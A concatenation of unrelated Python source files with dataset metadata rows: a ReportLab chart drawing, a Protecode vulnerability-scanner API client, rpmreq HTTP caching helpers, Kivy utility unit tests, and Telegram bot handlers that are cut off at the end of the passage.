        self.add(Rect(210,50,40,83.33333,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
        self.add(Rect(420,50,40,62.5,rx=0,ry=0,fillColor=Color(1,0,0,1),fillOpacity=None,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
        # horizontal axis line with tick marks at x = 50, 200, 350
        self.add(Line(50,49,350,49,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
        self.add(Line(50,49,50,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
        self.add(Line(200,49,200,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
        self.add(Line(350,49,350,44,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
        # category labels below the horizontal axis
        v0=self._nn(Group())
        v0.transform = (1,0,0,1,125,44)
        v0.add(String(-10,-10,'Ying',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
        v0=self._nn(Group())
        v0.transform = (1,0,0,1,275,44)
        v0.add(String(-10.83,-10,'Yang',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
        # vertical axis line with tick marks every 31.25 points
        self.add(Line(50,50,50,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=0,strokeDashArray=None,strokeOpacity=None))
        self.add(Line(50,50,45,50,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
        self.add(Line(50,81.25,45,81.25,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
        self.add(Line(50,112.5,45,112.5,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
        self.add(Line(50,143.75,45,143.75,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
        self.add(Line(50,175,45,175,strokeColor=Color(0,0,0,1),strokeWidth=1,strokeLineCap=0,strokeLineJoin=0,strokeMiterLimit=10,strokeDashArray=None,strokeOpacity=None))
        # numeric value labels (0..60) alongside the vertical axis
        v0=self._nn(Group())
        v0.transform = (1,0,0,1,45,50)
        v0.add(String(-5,-4,'0',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
        v0=self._nn(Group())
        v0.transform = (1,0,0,1,45,81.25)
        v0.add(String(-10,-4,'15',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
        v0=self._nn(Group())
        v0.transform = (1,0,0,1,45,112.5)
        v0.add(String(-10,-4,'30',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
        v0=self._nn(Group())
        v0.transform = (1,0,0,1,45,143.75)
        v0.add(String(-10,-4,'45',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
        v0=self._nn(Group())
        v0.transform = (1,0,0,1,45,175)
        v0.add(String(-10,-4,'60',textAnchor='start',fontName='Times-Roman',fontSize=10,fillColor=Color(0,0,0,1)))
# Render the drawing as a PDF into the current directory when run directly.
if __name__=="__main__": #NORUNTESTS
    ExplodedDrawing_Drawing().save(formats=['pdf'],outDir='.',fnRoot=None)
| 100.622642 | 227 | 0.775173 |
795484531e3aa9da071a5a39cf1ca3f1d78b078c | 14,645 | py | Python | protecode/client.py | zkdev/cc-utils | 042c6632ca6f61a484bc0a71f85957aeba7f7278 | [
"BSD-3-Clause"
] | null | null | null | protecode/client.py | zkdev/cc-utils | 042c6632ca6f61a484bc0a71f85957aeba7f7278 | [
"BSD-3-Clause"
] | null | null | null | protecode/client.py | zkdev/cc-utils | 042c6632ca6f61a484bc0a71f85957aeba7f7278 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2019-2020 SAP SE or an SAP affiliate company. All rights reserved. This file is
# licensed under the Apache Software License, v. 2 except as noted otherwise in the LICENSE file
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
from urllib.parse import urlencode, quote_plus
import json
import time
from typing import List
import requests
from ci.util import not_empty, not_none, urljoin
from http_requests import check_http_code, mount_default_adapter
from .model import (
AnalysisResult,
CVSSVersion,
ProcessingStatus,
ScanResult,
Triage,
TriageScope,
VersionOverrideScope,
)
class ProtecodeApiRoutes(object):
    '''
    calculates API routes (URLs) for a subset of the URL endpoints exposed by
    "Protecode" (https://protecode.mo.sap.corp)

    Not intended to be instantiated by users of this module
    '''
    def __init__(self, base_url):
        self._base_url = not_empty(base_url)
        # pre-bind prefix helpers: documented "api" routes vs undocumented "rest" routes
        self._api_url = partial(self._url, 'api')
        self._rest_url = partial(self._url, 'rest')

    def _url(self, *parts):
        return urljoin(self._base_url, *parts)

    def apps(self, group_id, custom_attribs=None):
        '''Return the product-listing URL, optionally scoped to `group_id` and
        filtered by metadata attributes.

        `custom_attribs` defaults to None (instead of a shared mutable dict
        literal); semantics are unchanged.
        '''
        if custom_attribs is None:
            custom_attribs = {}
        url = self._api_url('apps')
        if group_id:
            url = urljoin(url, str(group_id))
        # Protecode metadata search syntax: "meta:<key>=<value> ..."
        search_query = ' '.join(
            'meta:' + str(k) + '=' + str(v) for k, v in custom_attribs.items()
        )
        if search_query:
            url += '?' + urlencode({'q': search_query})
        return url

    def login(self):
        # trailing slash is required by the login endpoint
        return self._url('login') + '/'

    def pdf_report(self, product_id: int):
        return self._url('products', str(product_id), 'pdf-report')

    def groups(self):
        return self._api_url('groups')

    def upload(self, file_name):
        # the file name becomes a URL path segment and must be quoted
        return self._api_url('upload', quote_plus(file_name))

    def product(self, product_id: int):
        return self._api_url('product', str(product_id))

    def product_custom_data(self, product_id: int):
        return self._api_url('product', str(product_id), 'custom-data')

    def rescan(self, product_id):
        return self._api_url('product', str(product_id), 'rescan')

    def triage(self):
        return self._api_url('triage', 'vulnerability/')

    def version_override(self):
        return self._api_url('versionoverride/')

    # ---- "rest" routes (undocumented API)

    def scans(self, product_id: int):
        return self._rest_url('scans', str(product_id)) + '/'
class ProtecodeApi:
    """HTTP client for the Protecode (BDBA) binary-analysis service.

    Wraps a shared ``requests.Session``. The documented "api" routes use HTTP
    basic auth only; the undocumented "rest" routes additionally require the
    session id and CSRF token obtained via :meth:`login`.
    """
    def __init__(self, api_routes, basic_credentials, tls_verify=True):
        self._routes = not_none(api_routes)
        self._credentials = not_none(basic_credentials)
        # basic-auth tuple in the form requests expects
        self._auth = (basic_credentials.username(), basic_credentials.passwd())
        self._tls_verify = tls_verify
        self._session_id = None  # set by login(); required for "rest" routes
        self._session = requests.Session()
        mount_default_adapter(
            session=self._session,
        )
        self._csrf_token = None  # set by login()

    def set_maximum_concurrent_connections(self, maximum_concurrent_connections: int):
        """Re-mount the session adapter with a larger connection pool."""
        # mount new adapter with new parameters
        mount_default_adapter(
            session=self._session,
            max_pool_size=maximum_concurrent_connections,
        )

    @check_http_code
    def _request(self, method, *args, **kwargs):
        """Issue an HTTP request via *method* (a bound Session verb function),
        injecting basic auth and — once logged in — session/CSRF cookies."""
        if 'headers' in kwargs:
            headers = kwargs['headers']
            del kwargs['headers']
        else:
            headers = {}

        # the URL may come positionally or as a keyword argument
        if 'url' in kwargs:
            url = kwargs.get('url')
        else:
            url = args[0]

        if self._session_id:
            # "rest" endpoints require the CSRF token and a matching referer
            cookies = {
                'sessionid': self._session_id,
                'csrftoken': self._csrf_token,
            }
            headers['X-CSRFTOKEN'] = self._csrf_token
            headers['referer'] = url
        else:
            cookies = None

        auth = self._auth

        return partial(
            method,
            verify=self._tls_verify,
            auth=auth,
            headers=headers,
            cookies=cookies,
        )(*args, **kwargs)

    @check_http_code
    def _get(self, *args, **kwargs):
        return self._request(self._session.get, *args, **kwargs)

    @check_http_code
    def _post(self, *args, **kwargs):
        return self._request(self._session.post, *args, **kwargs)

    @check_http_code
    def _put(self, *args, **kwargs):
        return self._request(self._session.put, *args, **kwargs)

    @check_http_code
    def _delete(self, *args, **kwargs):
        return self._request(self._session.delete, *args, **kwargs)

    @check_http_code
    def _patch(self, *args, **kwargs):
        return self._request(self._session.patch, *args, **kwargs)

    def _metadata_dict(self, custom_attributes):
        '''
        replaces "invalid" underscore characters (setting metadata fails silently if
        those are present). Note: dash characters are implicitly converted to underscore
        by protecode.
        '''
        return {
            'META-' + str(k).replace('_', '-'): v
            for k,v in custom_attributes.items()
        }

    def upload(self, application_name, group_id, data, custom_attribs={}) -> AnalysisResult:
        """Upload *data* as a new product named *application_name* into *group_id*."""
        url = self._routes.upload(file_name=application_name)

        # group and custom metadata are passed as request headers
        headers = {'Group': str(group_id)}
        headers.update(self._metadata_dict(custom_attribs))

        result = self._put(
            url=url,
            headers=headers,
            data=data,
        )

        return AnalysisResult(raw_dict=result.json().get('results'))

    def delete_product(self, product_id: int):
        """Delete the product identified by *product_id*."""
        url = self._routes.product(product_id=product_id)

        self._delete(
            url=url,
        )

    def scan_result(self, product_id: int) -> AnalysisResult:
        """Fetch the (possibly still in-progress) analysis result for a product."""
        url = self._routes.product(product_id=product_id)

        result = self._get(
            url=url,
        ).json()['results']

        return AnalysisResult(raw_dict=result)

    def wait_for_scan_result(self, product_id: int, polling_interval_seconds=60):
        """Block until scanning reaches READY or FAILED, polling periodically."""
        def scan_finished():
            result = self.scan_result(product_id=product_id)
            if result.status() in (ProcessingStatus.READY, ProcessingStatus.FAILED):
                return result
            return False

        result = scan_finished()
        while not result:
            # keep polling until result is ready
            time.sleep(polling_interval_seconds)
            result = scan_finished()
        return result

    def list_apps(self, group_id, custom_attribs={}) -> List[AnalysisResult]:
        """List products in *group_id*, filtered by exact custom-metadata match."""
        url = self._routes.apps(group_id=group_id, custom_attribs=custom_attribs)

        result = self._get(
            url=url,
        )

        # Protecode checks for substring match only.
        def full_match(analysis_result_attribs):
            if not custom_attribs:
                return True
            for attrib in custom_attribs:
                # attrib is guaranteed to be a key in analysis_result_attribs at this point
                if analysis_result_attribs[attrib] != custom_attribs[attrib]:
                    return False
            return True

        return [
            AnalysisResult(p)
            for p in result.json().get('products') if full_match(p.get('custom_data'))
        ]

    def set_metadata(self, product_id: int, custom_attribs: dict):
        """Attach custom metadata (passed as META-* headers) to a product."""
        url = self._routes.product_custom_data(product_id=product_id)
        headers = self._metadata_dict(custom_attribs)

        result = self._post(
            url=url,
            headers=headers,
        )

        return result.json()

    def metadata(self, product_id: int):
        """Return the product's custom metadata.

        NOTE(review): this reads via POST (with empty headers), mirroring
        set_metadata — presumably what the endpoint expects; confirm.
        """
        url = self._routes.product_custom_data(product_id=product_id)

        result = self._post(
            url=url,
            headers={},
        )

        return result.json().get('custom_data', {})

    def add_triage(
        self,
        triage: Triage,
        scope: TriageScope=None,
        product_id=None,
        group_id=None,
        component_version=None,
    ):
        '''
        adds an existing Protecode triage to a specified target. The existing triage is usually
        retrieved from an already uploaded product (which is represented by `AnalysisResult`).
        This method is offered to support "transporting" existing triages.

        Note that - depending on the effective target scope, the `product_id`, `group_id` formal
        parameters are either required or forbidden.

        Note that Protecode will only accept triages for matching (component, vulnerabilities,
        version) tuples. In particular, triages for different component versions will be silently
        ignored. Explicitly pass `component_version` of target protecode app (/product) to force
        Protecode into accepting the given triage.

        @param triage: the triage to "copy"
        @param scope: if given, overrides the triage's scope
        @param product_id: target product_id. required iff scope in FN, FH, R
        @param group_id: target group_id. required iff scope is G(ROUP)
        @param component_version: overwrite target component version
        '''
        # if no scope is set, use the one from passed triage
        scope = scope if scope else triage.scope()

        # depending on the scope, different arguments are required
        if scope == TriageScope.ACCOUNT_WIDE:
            pass
        elif scope in (TriageScope.FILE_NAME, TriageScope.FILE_HASH, TriageScope.RESULT):
            not_none(product_id)
        elif scope == TriageScope.GROUP:
            not_none(group_id)
        else:
            raise NotImplementedError()

        if not component_version:
            component_version = triage.component_version()

        # "copy" data from existing triage
        # NOTE(review): the payload uses triage.scope().value, not the local
        # `scope` computed above — a passed-in `scope` override never reaches
        # the request. Confirm whether this is intended.
        triage_dict = {
            'component': triage.component_name(),
            'version': component_version,
            'vulns': [triage.vulnerability_id()],
            'scope': triage.scope().value,
            'reason': triage.reason(),
            'description': triage.description(),
        }

        if product_id:
            triage_dict['product_id'] = product_id

        if group_id:
            triage_dict['group_id'] = group_id

        return self.add_triage_raw(triage_dict=triage_dict)

    def add_triage_raw(
        self, triage_dict: dict
    ):
        """Submit a pre-built triage payload unmodified."""
        url = self._routes.triage()
        return self._put(
            url=url,
            json=triage_dict,
        ).json()

    # --- "rest" routes (undocumented API)

    def login(self):
        """Form-login; stores session id and CSRF token for the "rest" routes."""
        url = self._routes.login()

        result = self._post(
            url=url,
            data={
                'username': self._credentials.username(),
                'password': self._credentials.passwd(),
            },
            auth=None,
        )

        # session-id is returned in first response
        if not result.history:
            raise RuntimeError('authentication failed:' + str(result.text))

        relevant_response = result.history[0]

        # work around breaking change in protecode endpoint behaviour
        if not relevant_response.cookies.get('sessionid'):
            raw_cookie = relevant_response.raw.headers['Set-Cookie']
            session_id_key = 'sessionid='
            # XXX hack
            sid = raw_cookie[raw_cookie.find(session_id_key) + len(session_id_key):]
            sid = sid[:sid.find(';')] # let's hope sid never contains a semicolon
            self._session_id = sid
            del sid
        else:
            self._session_id = relevant_response.cookies.get('sessionid')
        self._csrf_token = relevant_response.cookies.get('csrftoken')

        if not self._session_id:
            raise RuntimeError('authentication failed: ' + str(relevant_response.text))

    def scan_result_short(self, product_id: int):
        """Fetch the abbreviated scan result ("rest" route)."""
        url = self._routes.scans(product_id)

        result = self._get(
            url=url,
        )
        return ScanResult(raw_dict=result.json())

    def set_product_name(self, product_id: int, name: str):
        """Rename a product ("rest" route)."""
        url = self._routes.scans(product_id)

        self._patch(
            url=url,
            data=json.dumps({'name': name,}),
            headers={'Content-Type': 'application/json'},
        )

    def rescan(self, product_id: int):
        """Trigger a re-scan of an already uploaded product."""
        url = self._routes.rescan(product_id)
        self._post(
            url=url,
        )

    def set_component_version(
        self,
        component_name:str,
        component_version:str,
        objects:[str],
        scope:VersionOverrideScope=VersionOverrideScope.APP,
        app_id:int = None,
        group_id:int = None,
    ):
        """Override the detected version of a component.

        APP scope requires `app_id`; GROUP scope requires `group_id`.
        """
        url = self._routes.version_override()

        override_dict = {
            'component': component_name,
            'version': component_version,
            'objects': objects,
            'group_scope': None,
            'scope': scope.value,
        }
        if scope is VersionOverrideScope.APP:
            if not app_id:
                raise RuntimeError(
                    'An App ID is required when overriding versions with App scope.'
                )
            override_dict['app_scope'] = app_id
        elif scope is VersionOverrideScope.GROUP:
            if not group_id:
                raise RuntimeError(
                    'A Group ID is required when overriding versions with Group scope.'
                )
            override_dict['group_scope'] = group_id
        else:
            raise NotImplementedError

        return self._put(
            url=url,
            json=[override_dict],
        ).json()

    def pdf_report(self, product_id: int, cvss_version: CVSSVersion=CVSSVersion.V3):
        """Download the PDF report for a product (logs in first if needed)."""
        if not self._csrf_token:
            self.login()
        url = self._routes.pdf_report(product_id)

        if cvss_version is CVSSVersion.V2:
            cvss_version_number = 2
        elif cvss_version is CVSSVersion.V3:
            cvss_version_number = 3
        else:
            raise NotImplementedError(cvss_version)

        response = self._get(
            url=url,
            params={'cvss_version': cvss_version_number},
        )
        return response.content
| 32.257709 | 100 | 0.612496 |
7954845c51b9d47639fb69428343a2ab19ea5d6b | 1,750 | py | Python | rpmreq/helpers.py | softwarefactory-project/rpmreq | b9b30cf6a184929db23ac86c8cc037592ee8b6be | [
"Apache-2.0"
] | null | null | null | rpmreq/helpers.py | softwarefactory-project/rpmreq | b9b30cf6a184929db23ac86c8cc037592ee8b6be | [
"Apache-2.0"
] | null | null | null | rpmreq/helpers.py | softwarefactory-project/rpmreq | b9b30cf6a184929db23ac86c8cc037592ee8b6be | [
"Apache-2.0"
] | 1 | 2019-03-10T10:07:04.000Z | 2019-03-10T10:07:04.000Z | import contextlib
import hashlib
import logging
import os
import requests
import time
from rpmreq import exception
# Module-level logger, named after this module.
log = logging.getLogger(__name__)
@contextlib.contextmanager
def cdir(path):
    """Context manager: run the body with *path* as the working directory.

    The previous working directory is restored on exit, even when the body
    raises.
    """
    original_dir = os.getcwd()
    os.chdir(path)
    try:
        yield
    finally:
        os.chdir(original_dir)
def ensure_dir(path):
    """Create *path* (with parents) unless it already exists as a directory.

    Raises exception.NotADirectory when *path* exists but is not a directory.
    """
    if not os.path.exists(path):
        os.makedirs(path)
    elif not os.path.isdir(path):
        raise exception.NotADirectory(path=path)
def get_default_cache_base_path():
    """Return the default rpmreq cache directory inside the user's home."""
    cache_home = "~/.rpmreq/cache"
    return os.path.expanduser(cache_home)
def short_hash(s):
    """Return the first six hex characters of the SHA-1 of the string *s*."""
    digest = hashlib.sha1(s.encode())
    return digest.hexdigest()[:6]
def repo_dir(repo_id, repo_url):
    """Directory name for a cached repo: '<repo_id>_<6-char SHA-1 of url>'."""
    url_tag = hashlib.sha1(repo_url.encode()).hexdigest()[:6]
    return "%s_%s" % (repo_id, url_tag)
def get_file_age(path):
    """Return seconds elapsed since *path* was created/changed (ctime)."""
    created = os.path.getctime(path)
    return time.time() - created
def cached_remote_fetch(cache_path, base_url, fn,
                        cache_ttl=3600, return_data=False):
    """Fetch ``base_url/fn`` with a simple on-disk cache.

    A cached copy younger than *cache_ttl* seconds is used instead of a
    network round-trip; a TTL of 0/None forces a fetch.

    :param cache_path: directory holding cached files (created if missing)
    :param base_url: remote base URL
    :param fn: file name (appended to the URL and used as the cache key)
    :param cache_ttl: maximum accepted cache age in seconds
    :param return_data: when True, return the file content; otherwise return
        True (fetched) / False (served from cache)
    :raises exception.RemoteFileFetchFailed: on a non-OK HTTP response
    """
    ensure_dir(cache_path)
    url = "%s/%s" % (base_url, fn)
    path = os.path.join(cache_path, fn)
    fetch = True
    age = None
    if cache_ttl and os.path.exists(path):
        # look for cache first
        age = get_file_age(path)
        if age <= cache_ttl:
            # use cached version
            fetch = False
    if fetch:
        r = requests.get(url, allow_redirects=True)
        if not r.ok:
            raise exception.RemoteFileFetchFailed(code=r.status_code, url=url)
        # fix: close the file handle deterministically instead of relying on
        # the garbage collector (open(...).write(...) leaked the handle)
        with open(path, 'wb') as out_file:
            out_file.write(r.content)
        if return_data:
            return r.content
        return True
    log.info('Using %d s old cached version of %s' % (age, fn))
    if return_data:
        with open(path, 'rt') as cached_file:
            return cached_file.read()
    return False
7954846da328529bd18cc0a32e13f23148cda410 | 7,973 | py | Python | kivy/tests/test_utils.py | Galland/kivy | 95a6bf279883d706f645e4629c16d5ee1038f0ec | [
"MIT"
] | 9 | 2016-09-03T07:20:01.000Z | 2020-05-21T14:44:48.000Z | kivy/tests/test_utils.py | Galland/kivy | 95a6bf279883d706f645e4629c16d5ee1038f0ec | [
"MIT"
] | 6 | 2020-01-31T18:04:48.000Z | 2021-06-05T10:53:55.000Z | kivy/tests/test_utils.py | Galland/kivy | 95a6bf279883d706f645e4629c16d5ee1038f0ec | [
"MIT"
] | 4 | 2016-09-10T15:27:54.000Z | 2020-03-27T22:05:31.000Z | '''
utils tests
===========
'''
import os
import unittest
try:
from unittest.mock import patch # python 3.x
except:
from mock import patch # python 2.x
from kivy.utils import (boundary, escape_markup, format_bytes_to_human,
is_color_transparent, SafeList, get_random_color, get_hex_from_color,
get_color_from_hex, strtotuple, QueryDict, intersection, difference,
interpolate, _get_platform, deprecated, reify)
from kivy import utils
class UtilsTest(unittest.TestCase):
    """Unit tests for the helpers exported by kivy.utils."""

    def test_escape_markup(self):
        escaped = escape_markup('Sun [1] & Moon [2].')
        self.assertEqual(escaped, 'Sun &bl;1&br; & Moon &bl;2&br;.')

    def test_format_bytes_to_human(self):
        a = format_bytes_to_human(6463)
        self.assertEqual(a, '6.31 KB')
        b = format_bytes_to_human(6463, precision=4)
        self.assertEqual(b, '6.3115 KB')
        c = format_bytes_to_human(646368746541)
        self.assertEqual(c, '601.98 GB')

    def test_boundary(self):
        # clamp below, above, and inside the [0, 100] range
        x = boundary(-1000, 0, 100)
        self.assertEqual(x, 0)
        x = boundary(1000, 0, 100)
        self.assertEqual(x, 100)
        x = boundary(50, 0, 100)
        self.assertEqual(x, 50)

    def test_is_color_transparent(self):
        c = [1, 1, 1]
        self.assertFalse(is_color_transparent(c))
        c = [1, 1, 1, 1]
        self.assertFalse(is_color_transparent(c))
        c = [1, 1, 1, 0]
        self.assertTrue(is_color_transparent(c))

    @deprecated
    def a_deprecated_function(self):
        """ This one has doc string. """
        pass

    def test_deprecated(self):
        self.a_deprecated_function()

    def test_SafeList_iterate(self): # deprecated
        sl = SafeList(['1', 2, 3.])
        self.assertTrue(isinstance(sl, list))
        it = sl.iterate()
        self.assertEqual(next(it), '1')
        self.assertEqual(next(it), 2)
        self.assertEqual(next(it), 3.)

    def test_SafeList_iterate_reverse(self): # deprecated
        sl = SafeList(['1', 2, 3.])
        self.assertTrue(isinstance(sl, list))
        it = sl.iterate(reverse=True)
        self.assertEqual(next(it), 3.)
        self.assertEqual(next(it), 2)
        self.assertEqual(next(it), '1')

    def test_SafeList_clear(self):
        sl = SafeList(['1', 2, 3.])
        self.assertTrue(isinstance(sl, list))
        sl.clear()
        self.assertEqual(len(sl), 0)

    def test_get_random_color_fixed_alpha(self):
        actual = get_random_color()
        self.assertEqual(len(actual), 4)
        self.assertEqual(actual[3], 1.)
        actual = get_random_color(alpha=.5)
        self.assertEqual(len(actual), 4)
        self.assertEqual(actual[3], .5)

    def test_get_random_color_random_alpha(self):
        actual = get_random_color(alpha='random')
        self.assertEqual(len(actual), 4)

    def test_get_hex_from_color_noalpha(self):
        actual = get_hex_from_color([0, 1, 0])
        expected = '#00ff00'
        self.assertEqual(actual, expected)

    def test_get_hex_from_color_alpha(self):
        actual = get_hex_from_color([.25, .77, .90, .5])
        expected = '#3fc4e57f'
        self.assertEqual(actual, expected)

    def test_get_color_from_hex_noalpha(self):
        actual = get_color_from_hex('#d1a9c4')
        expected = [0.81960784, 0.66274509, 0.76862745, 1.]
        for i in range(4):
            self.assertAlmostEqual(actual[i], expected[i])

    def test_get_color_from_hex_alpha(self):
        actual = get_color_from_hex('#00FF7F7F')
        expected = [0., 1., 0.49803921, 0.49803921]  # can't get .5 from hex
        for i in range(4):
            self.assertAlmostEqual(actual[i], expected[i])

    def test_strtotuple(self):
        # malformed inputs must raise; a well-formed tuple string must parse
        self.assertRaises(Exception, strtotuple, 'adis!_m%*+-=|')
        self.assertRaises(Exception, strtotuple, '((12, 8, 473)')
        self.assertRaises(Exception, strtotuple, '[12, 8, 473]]')
        self.assertRaises(Exception, strtotuple, '128473')
        actual = strtotuple('(12, 8, 473)')
        expected = (12, 8, 473)
        self.assertEqual(actual, expected)

    def test_QueryDict(self):
        qd = QueryDict()
        self.assertTrue(isinstance(qd, dict))

        # __setattr__
        qd.toto = 1
        self.assertEqual(qd.get('toto'), 1)

        # __getattr__
        toto = qd.toto
        self.assertEqual(toto, 1)
        with self.assertRaises(AttributeError):
            foo = qd.not_an_attribute

    def test_intersection(self):
        abcd = ['a', 'b', 'c', 'd']
        efgh = ['e', 'f', 'g', 'h']
        fedc = ['c', 'd', 'e', 'f'] # cdef is cython keyword O_o)
        feed = ['f', 'e', 'e', 'd']
        self.assertEqual(intersection(abcd, efgh), [])
        self.assertEqual(intersection(abcd, fedc), ['c', 'd'])
        self.assertEqual(intersection(feed, feed), feed)
        self.assertEqual(intersection([], []), [])
        self.assertEqual(intersection(feed, fedc), feed)
        self.assertEqual(intersection(fedc, feed), ['d', 'e', 'f'])
        self.assertEqual(intersection(feed, efgh), ['f', 'e', 'e'])

    def test_difference(self):
        abcd = ['a', 'b', 'c', 'd']
        efgh = ['e', 'f', 'g', 'h']
        fedc = ['c', 'd', 'e', 'f'] # cdef is cython keyword O_o
        feed = ['f', 'e', 'e', 'd']
        self.assertEqual(difference(abcd, efgh), ['a', 'b', 'c', 'd'])
        self.assertEqual(difference(efgh, fedc), ['g', 'h'])
        self.assertEqual(difference([], []), [])
        self.assertEqual(difference(abcd, abcd), [])
        self.assertEqual(difference(fedc, feed), ['c'])
        self.assertEqual(difference(feed, abcd), ['f', 'e', 'e'])
        self.assertEqual(difference(abcd, feed), ['a', 'b', 'c'])

    def test_interpolate_solo(self):
        values = [10., 19., 27.1]
        a = 0.
        for i in range(0, 3):
            a = interpolate(a, 100)
            self.assertEqual(a, values[i])

    def test_interpolate_multi(self):
        x = [10., 19., 27.1]
        y = [-10., -19., -27.1]
        p = 0., 0.
        for i in range(0, 3):
            p = interpolate(p, [100, -100])
            self.assertEqual(p, [x[i], y[i]])

    @reify
    def fib_100(self):
        """ return 100th Fibonacci number
        This uses modern view of F sub 1 = 0, F sub 2 = 1. """
        # print "calculating..."
        a, b = 0, 1
        for n in range(2, 101):
            a, b = b, a + b
        return b

    def test_reify(self):
        # slow. self.fib_100 is a reify object making the lazy call.
        first = self.fib_100
        second = self.fib_100  # fast, self.fib_100 is a long.
        assert first == second

    def test_Platform_android(self):
        with patch.dict('os.environ', {'ANDROID_ARGUMENT': ''}):
            pf = _get_platform()
            self.assertTrue(pf == 'android')
        # patch.dict must have restored the environment
        self.assertNotIn('ANDROID_ARGUMENT', os.environ)

    def test_Platform_ios(self):
        with patch.dict('os.environ', {'KIVY_BUILD': 'ios'}):
            pf = _get_platform()
            self.assertEqual(pf, 'ios')
        self.assertNotIn('KIVY_BUILD', os.environ)

    def test_Platform_win32(self):
        self._test_platforms('win32', 'win')

    def test_Platform_cygwin(self):
        self._test_platforms('cygwin', 'win')

    def test_Platform_linux2(self):
        self._test_platforms('linux2', 'linux')

    def test_Platform_darwin(self):
        self._test_platforms('darwin', 'macosx')

    def test_Platform_freebsd(self):
        self._test_platforms('freebsd', 'linux')

    def test_Platform_unknown(self):
        self._test_platforms('randomdata', 'unknown')

    def _test_platforms(self, input, testval):
        # Helper: force kivy.utils._sys_platform and check the detected value.
        utils._sys_platform = input
        pf = _get_platform()
        self.assertTrue(pf == testval)
        # with patch('kivy.utils._sys_platform') as m:
        #     m.__str__.return_value = input
        #     m.__eq__ = lambda x, y: str(x) == y
        #     pf = _get_platform()
        #     self.assertTrue(str(pf) == testval)
| 34.366379 | 77 | 0.587106 |
795484d85416c13a083ff12b932857b3b5a92852 | 1,804 | py | Python | handlers/client.py | allexvip/bot | e6bedb701abaf5ab9f8fc660ef1129f9d7414cc7 | [
"MIT",
"Unlicense"
] | null | null | null | handlers/client.py | allexvip/bot | e6bedb701abaf5ab9f8fc660ef1129f9d7414cc7 | [
"MIT",
"Unlicense"
] | null | null | null | handlers/client.py | allexvip/bot | e6bedb701abaf5ab9f8fc660ef1129f9d7414cc7 | [
"MIT",
"Unlicense"
] | null | null | null | from aiogram import types, Dispatcher
from create_bot import dp, bot, BOT_NAME, START_MESSAGE
from keyboards import kb_client
from aiogram.types import ReplyKeyboardRemove
from db import sqlite_db
'''******************** Client part ********************************'''
@dp.message_handler(commands=['start', 'help'])
async def command_start(message: types.Message):
    """Handle /start and /help: DM the greeting with the client keyboard."""
    try:
        await bot.send_message(message.from_user.id, START_MESSAGE, reply_markup=kb_client)
        await message.delete()
    except Exception as e:
        # Fallback when the direct message could not be sent (the reply text
        # points the user at the bot's DM); then report the error to the admin.
        await message.reply('Общение с ботом через личные сообщения, напишите ему:\nhttps://t.me/{0}'.format(BOT_NAME))
        # NOTE(review): BOT_ADMIN_CHATID is not imported in this module — if
        # this branch runs it would raise NameError; confirm the intended
        # import (presumably from create_bot).
        await bot.send_message(BOT_ADMIN_CHATID,
                               'Error:\n@{0} ({1})\n{2}\n\n{3}'.format(message.from_user.username, message.from_user.id,
                                                                       message.text, str(e)))
@dp.message_handler(commands=['Режим_работы'])
async def open_command(message: types.Message):
    """Handle /Режим_работы: DM the opening hours."""
    await bot.send_message(message.from_user.id, 'ПН-ВС с 10:00 до 20:00')
@dp.message_handler(commands=['Расположение'])
async def place_command(message: types.Message):
    """Handle /Расположение: the location is not announced yet."""
    await bot.send_message(message.from_user.id, 'Скоро открытие') #,reply_markup=ReplyKeyboardRemove()
@dp.message_handler(commands=['Меню'])
async def menu_command(message : types.Message):
    """Handle /Меню: send the header, then delegate to sqlite_db.sql_read."""
    await bot.send_message(message.from_user.id,'Мы предлагаем:', reply_markup = kb_client)
    # sql_read presumably sends the stored menu items to the user — verify
    # against the db.sqlite_db module.
    await sqlite_db.sql_read(message)
def register_handlers_client(dp: Dispatcher):
    """Register the client-side command handlers on *dp*.

    Uses Dispatcher.register_message_handler: calling ``dp.message_handler(...)``
    only builds a decorator object and registers nothing, so the original
    calls here were silent no-ops.
    """
